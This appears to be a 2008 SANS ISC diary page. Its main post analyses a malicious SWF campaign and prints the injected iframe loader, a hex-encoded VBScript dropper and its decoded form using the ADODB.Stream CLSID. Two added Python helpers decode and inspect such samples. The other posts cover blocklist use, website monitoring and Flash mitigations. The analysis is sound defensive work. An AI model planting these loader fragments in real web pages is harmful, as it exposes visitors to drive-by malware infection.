
SANS ISC InfoSec Handlers Diary Blog


So, how do you monitor your website?

Published: 2008-05-28
Last Updated: 2008-05-28 23:58:44 UTC
by Jim Clausing (Version: 1)
0 comment(s)

With all the talk of SQL injections and XSS and such, and all of these malicious SWFs, I was conversing with one of our readers, Steve, today and figured I'd ask the rest of you for some advice.  Steve has a script that he uses to monitor his website for malicious content, but I was wondering, beyond the obvious of using Tripwire, AIDE, Samhain, Osiris, etc., what do you use to monitor your own websites?  Let us know via the contact page, and we'll summarize the results this weekend.

Keywords: So

Reminder: Proper use of DShield data

Published: 2008-05-28
Last Updated: 2008-05-28 21:04:35 UTC
by Johannes Ullrich (Version: 1)
2 comment(s)
Once in a while, we receive requests to remove an IP from our "blocklist", only to find out that the particular IP address isn't in our blocklist. Usually, it turns out that someone is using part of our DShield list in a way they are not supposed to be used.

DShield currently only publishes one blocklist: . It removes some of the obvious false positives. Of course, like with any block list, you should still use it at your own risk.

In addition, we are publishing the "Highly Predictive Blocklists" ( These blocklists are currently experimental, and a new version of the software should actually be released shortly.

Finally, there are a number of other "lists". For example, the following list is quite popular:

Note the big disclaimer at the top of this list:

# ipsascii.html

This list contains the top IPs, without any consideration to false positives.

Why don't we filter false positives?

Well, if it were easy, we would do it. But first of all, DShield is a research tool. It has to provide consistent and complete data. In a particular case that came up today, a site was under DDoS attack. Our sensors picked up backscatter traffic and reported it to us. As a result, the site ended up in 'ipsascii.html'. I'd rather keep this type of activity in my database. Measuring backscatter is one thing we can do with our data. Another common false positive is P2P afterglow. But in case there is active scanning for P2P networks, we need to know what this afterglow looks like in order to subtract it.

So again: stick to the recommended block lists. If you find an IP in our blocklist that shouldn't be there, let us know and we will remove it ASAP. But any raw data associated with the IP address will remain in our database. Finding an IP address in our database doesn't automatically mean that they are an "attacker" or "evil". To figure out what is happening, we need to look at the data in more detail.

Keywords: blocklist dshield

Another example of malicious SWF

Published: 2008-05-28
Last Updated: 2008-05-28 17:16:57 UTC
by Adrien de Beaupre (Version: 1)
0 comment(s)

Jerry wrote in to tell us of a new variant on the theme of SWF files
being found in the wild. This one uses encoded VBScript to deliver.
A Google search for gives us over 5,000 hits! The likely
method of getting the malicious scripts onto these web servers is SQL
injection; check your code regularly.

So, let's take a look at this one:


Which contains:

if (navigator.systemLanguage=='zh-cn')
document.writeln("<iframe src=hxxp://
width=0 height=0></iframe>");

Downloading hxxp:// gives us the following:

<Script Language="VBScript">
Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204
Function Hex2Str(ByVal Ans):For i = 1 To Len(Ans)
Step 2:If IsNumeric(Mid(Ans, i, 1)) Then:tmpStr = tmpStr &
Chr("&H" & Mid(Ans, i, 2)):Else:tmpStr = tmpStr & Chr("&H" &
Mid(Ans, i, 4)):i = i + 2: End If: Next: Hex2Str = tmpStr: End Function
Document.Write Hex2Str(Song)
<script language="javascript"

This decodes using hex to string:

<Script Language=VBScript>
        On Error Resume Next
        Set Ob = Document.CreateElement("object")
        Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
        Set Pop = Ob.Createobject("Adodb.Stream","")
        If Not Err.Number = 0 then
                Document.write ("<embed src=\"flash.swf\"></embed>")
                Document.write ("<iFrame sRc=real.htm width=0 height=0></ifrAmE>")
                Document.write ("<iFrame sRc=new.htm width=0 height=0></ifrAmE>")
                Document.write ("<iFrame sRc=help.htm width=0 height=0></ifrAmE>")
        End If
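The Hex2Str() routine above, reimplemented in Python as an added example (not code from the diary) so a "Song" string can be decoded offline and checked for the behaviours the decoded payload shows. Treating the 4-digit units as GBK double-byte characters is an assumption drawn from the loader's zh-cn check; the indicator checks use the CLSID and hidden-iframe pattern from the decoded payload above.

```python
import re

# CLSID of the ADODB.Stream control from the decoded payload above, and the
# hidden-iframe pattern it writes; both used by find_indicators()
ADODB_CLSID = "BD96C556-65A3-11D0-983A-00C04FC29E36"
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*width=0[^>]*height=0", re.IGNORECASE)
HEXDIGITS = set("0123456789abcdefABCDEF")

# The 65 hex characters quoted in the diary (the Song string is cut off there)
SONG_PREFIX = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204"


def hex2str(song, codec="gbk"):
    """Decode a Song string the way the VBScript Hex2Str() does.

    The VBScript loop reads a 2-digit unit when the first digit is 0-9 and a
    4-digit unit otherwise; under a DBCS locale Chr() of a 4-digit value is a
    double-byte character, so the collected bytes are decoded with a DBCS
    codec (GBK here, an assumption).  Returns (text, leftover), where leftover
    is any trailing partial or non-hex unit instead of silently mis-decoding it.
    """
    buf = bytearray()
    i = 0
    while i < len(song):
        width = 2 if song[i].isdigit() else 4
        unit = song[i:i + width]
        if len(unit) < width or not set(unit) <= HEXDIGITS:
            return buf.decode(codec, errors="replace"), song[i:]
        buf += int(unit, 16).to_bytes(width // 2, "big")
        i += width
    return buf.decode(codec, errors="replace"), ""


def find_indicators(decoded):
    """Flag the behaviours the decoded payload in the diary exhibits."""
    low = decoded.lower()
    hits = []
    if ADODB_CLSID.lower() in low:
        hits.append("adodb-stream-clsid")
    if "adodb.stream" in low:
        hits.append("adodb-stream-object")
    if HIDDEN_IFRAME.search(decoded):
        hits.append("hidden-iframe")
    if "on error resume next" in low:
        hits.append("error-suppression")
    return hits
```

Running hex2str(SONG_PREFIX) yields the opening of the decoded script shown above plus a leftover "4", which is the truncation point of the quoted string.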

Let's get hxxp://
Which gives us:

file flash.swf
flash.swf: Macromedia Flash data, version 9

swfdump flash.swf
[HEADER]        File version: 9
[HEADER]        File size: 858
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 771
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[006]       336 DEFINEBITS defines id 0682
==== Error: Unknown tag:0x056 ====
[056]        40 (null)
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
==== Error: Unknown tag:0x056 ====
[056]        12 (null)
==== Error: Unknown tag:0x052 ====
[052]       383 (null)
==== Error: Unknown tag:0x04c ====
[04c]        25 (null)
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Which looks familiar to us now.
real.htm, new.htm, help.htm are also quite interesting.
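The "Unknown tag" lines in the swfdump output are SWF version 9 tags that older swfdump builds do not recognise: 0x56 is DefineSceneAndFrameLabelData, 0x52 is DoABC (ActionScript 3 bytecode) and 0x4C is SymbolClass. The following added example (not the diary's code) walks the tag list of an uncompressed FWS file and names those tags; the sample file the test builds is constructed here with the same tag codes and lengths as the output above, not the diary's flash.swf.

```python
import struct

# Tag codes from the SWF file format specification; 0x56/0x52/0x4C are the
# ones the diary's swfdump printed as "Unknown tag"
TAG_NAMES = {
    0: "End", 1: "ShowFrame", 6: "DefineBits", 9: "SetBackgroundColor",
    69: "FileAttributes", 76: "SymbolClass", 82: "DoABC",
    86: "DefineSceneAndFrameLabelData",
}


def swf_tags(data):
    """Return [(code, name, length)] for each tag of an uncompressed (FWS) SWF."""
    if data[:3] != b"FWS":
        raise ValueError("only uncompressed FWS files are handled here")
    # Header: 'FWS', version, UI32 length, RECT, UI16 frame rate, UI16 frame count
    nbits = data[8] >> 3                        # RECT starts with a 5-bit Nbits field
    pos = 8 + (5 + 4 * nbits + 7) // 8 + 4      # skip RECT, frame rate, frame count
    tags = []
    while pos + 2 <= len(data):
        code_and_len = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        code, length = code_and_len >> 6, code_and_len & 0x3F
        if length == 0x3F:                      # long form: UI32 length follows
            length = struct.unpack_from("<I", data, pos)[0]
            pos += 4
        tags.append((code, TAG_NAMES.get(code, "Unknown"), length))
        pos += length
        if code == 0:
            break
    return tags


def has_actionscript3(tags):
    """DoABC carries ActionScript 3 bytecode; SymbolClass binds it to the main
    timeline so it runs as soon as the movie loads."""
    codes = {code for code, _, _ in tags}
    return 82 in codes and 76 in codes


def build_fws(tag_list):
    """Constructed FWS writer (test fixture): tag_list is [(code, payload bytes)]."""
    body = b""
    for code, payload in tag_list:
        if len(payload) < 0x3F:
            body += struct.pack("<H", (code << 6) | len(payload)) + payload
        else:
            body += struct.pack("<HI", (code << 6) | 0x3F, len(payload)) + payload
    tail = b"\x00" + struct.pack("<HH", 12 << 8, 1)   # RECT Nbits=0, 12.0 fps, 1 frame
    return b"FWS" + bytes([9]) + struct.pack("<I", 13 + len(body)) + tail + body
```

A CWS (zlib-compressed) file must be inflated from byte 8 onward before being handed to swf_tags(); the header fields before the RECT are stored uncompressed.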

strings flash.swf shows us another possible malware location:
FWS     Z
flash.display   MovieClip

I munged the name of the file to pass language filters.
When I checked resolved to and didn't
want to give me the file.

Thanks again Bojan and Jeremy!

Adrien de Beaupré
Bell Canada, Professional Services

Keywords: malware swf

Followup to Flash/swf stories

Published: 2008-05-28
Last Updated: 2008-05-28 16:57:38 UTC
by Jim Clausing (Version: 2)
1 comment(s)

We've received quite a bit of mail about our stories yesterday about the malicious SWF files attempting to exploit older versions of the Adobe Flash player.  So, here are a few of the things that have come out of our discussions.

  1. Our friends over at (thanx, Steven) have a nice writeup that includes a bunch of domains they've noted that have the malicious SWF files.
  2. If you aren't sure which version of the flash player you are using, Adobe provides this page where you can check for yourself.
  3. On closer examination, this does not appear to be a "0-day exploit".  Symantec has updated their threatcon info, as well.  We have yet to see one of these that succeeds against the current version (, if you find one that does, please let us know via the contact page.
  4. It appears that this exploit may be included in the Chinese version of the MPack exploit toolkit (among others).
  5. In case we weren't clear about it earlier, it appears that the infected web sites check which browser you are using in addition to the flash player version to determine which exploit to deliver.

There are several ways to protect yourself even if you have a vulnerable version of the Flash player.

  • In Firefox, you can use either of the following add-ons, NoScript (one of our favorites, found here or here) or FlashBlock (here or here).
  • In IE, see here for how to set the "killbit", the CLSID is BD96C556-65A3-11D0-983A-00C04FC29E36.

Update: (2008-05-28-16:54UTC) I was remiss in not mentioning Dancho Danchev's writeup.

Keywords: flash swf

Podcast Episode Five has been released

Published: 2008-05-28
Last Updated: 2008-05-28 14:32:26 UTC
by Joel Esler (Version: 1)
0 comment(s)

Morning everyone,

Just a quick note to let everyone know that we put out Podcast Episode 5 this morning.  We had a special guest with us!  Larry Pesce of PaulDotCom Security Weekly!  The guys over at PaulDotCom do a great job, and we loved having Larry on the show!  Congratulations to Paul, as he is home with a new baby!

Don't forget the Live Podcast that we are doing at SANSFIRE on July 23rd at 8pm.

iTunes users, go here to subscribe.

Non-iTunes users, go here to download.



Joel Esler

Keywords: podcast